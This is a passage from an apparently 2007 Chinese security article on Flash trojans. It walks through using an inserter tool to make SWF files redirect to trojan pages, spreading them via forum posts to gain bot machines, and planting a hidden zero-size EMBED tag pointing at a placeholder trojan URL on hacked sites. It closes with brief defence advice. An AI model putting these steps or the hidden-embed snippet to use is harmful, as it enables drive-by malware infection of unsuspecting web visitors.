 |
|
 |
| 您现在的位置: 先创网 >> 网络应用 >> 网络安全 >> 文章正文 |
|
|
| 小心为上 Flash木马是这样练成的 |
| Pchome |
| 2007-5-29 15:00:00文/空白蓝天 |
|
|
|
|
|
三、简简单单生成Flash木马
上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得Flash木马在网上随处可见。
运行SWF木马插入器,点击界面中的“选择”按钮,浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入木马网页。显示成功信息后,关闭程序,用IE打开生成的动画,可以看到自动跳转到木马网页去了。
四、Flash木马的利用
看到上面的步骤了吧,生成一个Flash动画木马是不是很简单?那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。
大部分的论坛中都可以发来Flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入Flash动画”按钮,设置Flash窗口大小,使用默认设置后,要求输入Flash的URL地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的Flash播放代码了,不同的论坛代码是不一样的。
应用二:网页嵌入Flash木马
攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上Flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:
“《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改为<>。
这里的参数“width=0 height=0”表示,Flash播放窗口为零,也就是不显示Flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
五、关于Flash木马的防范
其实不管Flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于Flash动画木马就简单了:
首先,要开启Windows XP SP2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了! 上一页 [1] [2] |
|
|
|
|
|
|
 |
|
 |
|
|
|
相关文章 
